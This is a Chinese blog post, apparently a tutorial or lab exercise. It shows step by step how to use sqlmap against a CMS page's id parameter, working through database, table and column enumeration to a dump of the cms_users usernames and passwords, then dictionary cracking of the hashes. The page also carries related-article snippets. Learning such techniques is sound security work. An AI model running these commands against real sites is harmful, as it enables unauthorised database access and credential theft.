SQLmap自动化注入实例-CMS

最新推荐文章于 2024-05-20 14:29:58 发布
最新推荐文章于 2024-05-20 14:29:58 发布
阅读量355 收藏 8
点赞数 7
分类专栏: # SQL注入 文章标签: 自动化 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/135541655
版权

文章目录

CMS

1.寻找可能存在SQL注入点的页面

在这里插入图片描述

2.在SQLmap中输入注入命令

第一步:(打开sqlmap)

在这里插入图片描述

第二步:(猜解所有数据库名)
sqlmap -u "http://xxxxxxx/cms/show.php?id=38" --dbs

-u后写要注入的URL
–dbs指猜解所有的数据库名
在这里插入图片描述
爆破出的数据库名:
在这里插入图片描述

第三步:(猜解指定数据库的表名)
sqlmap -u "http://xxxxxxxx/cms/show.php?id=38" -D cms --tables

-D cms 指定数据库
–tables指猜解指定数据库中所有表名
在这里插入图片描述
爆破出的表名:
在这里插入图片描述

第四步:(猜解指定表的所有字段)
sqlmap -u "http://xxxxxxx/cms/show.php?id=38" -D cms -T cms_users --columns

-D cms 指定数据库
-T cms_users 指定数据库中的表名
–columns 猜解指定表的所有字段
在这里插入图片描述
爆破出的列名:
在这里插入图片描述

第五步:(猜解数据信息)
sqlmap -u "http://xxxxxxx/cms/show.php?id=38" -D cms -T cms_users -C username,password --dump

-D cms 指定数据库
-T cms_users 指定数据库中的表名
-C username,password 指定列名
–dump 猜解指定列的数据
在这里插入图片描述
爆破出的内容:
在这里插入图片描述

第六步:(使用字典爆破出加密信息)

在这里插入图片描述

摆烂鱼
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap自动化注入工具
05-19
sqlmap自动化注入工具可用于sql注入
渗透测试SQL注入——Sqlilabs关卡详解
人若有志,就不会在半坡停止。
10-18 909
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
SQLMap介绍
Kali与编程
12-10 1057
在使用SQLMap进行渗透测试时,需要掌握SQLMap的基本用法,包括测试目标的URL、参数、Cookie等,以及常见测试选项和测试结果的解释。本文将从渗透测试工程师的角度,详细介绍SQLMap的基本用法,包括测试目标的URL、参数、Cookie等,以及常见测试选项和测试结果的解释。其中,–level参数指定测试的深度为2,–risk参数指定测试的风险级别为2,–delay参数指定测试之间的时间延迟为1秒,–batch参数以批处理模式运行,–dump参数导出数据库中的数据。下载完成后,将文件解压到本地。
SQLMap进阶使用
Kali与编程
12-10 1032
在使用 SQLMap 插件时,我们需要了解 SQLMap 的基本使用方法,并掌握一些高级功能,如配置 SQLMap、使用 Payloads 和 Tamper Scripts、使用插件 API 等。其中一个最流行的工具是sqlmap,它是一个功能强大的自动化SQL注入工具,可以执行各种高级注入技术。在本文中,我将详细介绍sqlmap的高级用法。可以通过该选项设置注入技术,包括B:布尔型盲注、E:错误型注入、U:基于联合查询的注入、S:基于堆栈的注入、T:基于时间的盲注、Q:基于双查询的注入、A:自动检测。
BlueCMS v1.6 代码审计之SQL注入
yy
08-23 4551
目录 sql注入1 sql注入2 hackbar提交post数据 最近开始入坑代码审计,而最好的学习方式就是模仿,站在前人的肩膀上,能让我们更加快速的成长。 blueCMS是一款小众的CMS,网上也有人发布其相关漏洞。接下来对已公布的漏洞进行源码分析 环境准备 BlueCMS v1.6 phpstudy 2018 php5.5.35 phpstorm sql注入1 首先查看配置文件,发现网站有统一的过滤方法,在文件common.inc.php中,对$_post、$_get、$_co
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
04-20
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
04-20
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
第十四节 Sqlmap注入技术参数2-01
09-15
第十四节 Sqlmap注入技术参数2-01
Day03-zabbix自动化监控与监控项目
苦难带不走梦想
05-17 640
zabbix客户端应用场景Zabbix-agent2(最常用)适用于几乎所有情况,支持自定义监控,linux,windows, android/iosSNMP客户端用于监控网络设备:简单网络管理协议监控网络设备JMXJava-gateway 监控java app(tomcat),未来推荐自定义监控(zabbix_agents2 + jmap/jstats)IPMI监控硬件(物理服务器,联想(IBM X86架构 ThinkServer) ,华为,浪潮,Dell,IBM,HP)
SDN 部署自动化
MrLi的博客
05-14 540
通过以上设计方案的实施,可以进一步提高 SDN 网络的自动化程度和管理效率,降低网络运维成本和复杂度,提高网络的可靠性和可扩展性。同时,这也为未来的网络创新和发展提供了更多的可能性和机会。
GScan 工具使用指南:自动化排查 Linux 系统后门的详细步骤
weixin_43822401的博客
05-17 478
通过上述步骤,你可以更详细地了解如何使用 GScan 工具来自动化排查 Linux 系统中的后门和其他安全隐患。使用以下命令运行 GScan 工具的快速检查模式,这将快速检查系统并给出初步处理方案。首先,从 GitHub 上下载 GScan 工具的压缩包,并解压到本地目录。如果需要执行更彻底的检查,可以使用完全模式,但请注意这可能会消耗更多的时间。根据 GScan 提供的报告和建议,进行必要的安全加固和清理工作。如果需要对异常点进行手工排查,可以使用排查建议模式。参数来查看 GScan 工具的使用选项。
水电站机组油压自动化控制系统概述及优势介绍
cdgkzdh的博客
05-14 278
国科JSF水电站机组油压自动化控制系统,采用高性能PLC为核心控制单元,配置自动补气装置,软启动器,多功能组合阀,压力、液位监测变送器以及液晶显示设定单元等可靠器件,可实现机组油压装置的自动补油、自动补气、保证机组或公用设备的安全、可靠运行。国科JSF水电站机组油压自动化控制系统,适用于水轮发电机组调速器油压及主阀(蝶阀、球阀、闸阀)油压装置的自动控制。自动补气:能保证压油装置运行在正常的工作压力范围内;自动补油:自动控制压力油泵工作,保证压力油罐中的油位始终保持在正常范围内;
激光雷达在AGV(自动化导引车)中的应用
镭眸激光雷达
05-17 291
ILS-F30激光扫描传感器采用时间飞行(TOF)测距原理,融合了光学、电学、机械运动学等多学科领域前沿技术,能够实现270°视场角、最远50m范围内的区域检测于保护。
自动化小白入门神器Playwright
最新发布
qq_24205027的博客
05-20 235
2. 创建一个Playwright实例:安装完成后,你需要在你的代码中引入Playwright,然后创建一个Playwright的实例。4. 进行自动化操作:一旦你打开了一个页面,你可以使用Playwright提供的方法来进行各种自动化操作。在这个例子中,我们使用浏览器实例的`newPage()`方法创建了一个新的页面,并使用`goto()`方法导航到指定的网页。在这个例子中,我们使用`click()`方法模拟鼠标点击一个按钮,使用`type()`方法在一个输入框中输入文本。
【Linux】自动化编译工具——make/makefile(超细图例详解!!)
weixin_45031801的博客
05-14 1013
在我们常见的项目编译中肯定会包含很多代码文件,只会运用 指令 是不够滴,所以本次博客我们来介绍一下如何使用 make/Makefile 实现项目的自动化构建。
探索自动化测试用例设计粒度
NHB456789的博客
05-18 867
自动化测试用例的粒度指的是测试用例的细致程度,即每个测试用例检查的功能点的数量和范围。通常,根据测试用例的粒度,可以被分为3种不同的层次,从更低层次的细粒度到更高层次的粗粒度。单元测试是测试金字塔的基础,聚焦于程序的最小单元,例如个别函数或方法。单元测试是开发阶段的核心,目的在于保证代码的每一部分都能按照预期工作。关键点:高频率执行:每次代码提交后都应执行单元测试,以保证代码质量。快速反馈:单元测试的执行速度应该很快,以便开发者能够及时发现并修复问题。
Makefile 简介:自动化你的构建过程
gygkhd的博客
05-18 421
在软件开发中,特别是在涉及大型项目时,经常需要重复执行构建、测试和部署等一系列复杂的任务。为了简化这一过程,Makefile应运而生。Makefile是一种构建自动化工具的配置文件,通常用于管理项目中的文件编译链接过程。它定义了一组规则来指定如何生成目标文件和执行任务。
sqlmap --is-dba的实例
07-28
- *1* *2* [渗透工具-sqlmap-基本知识及使用教程](https://blog.csdn.net/m0_59856804/article/details/129154969)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值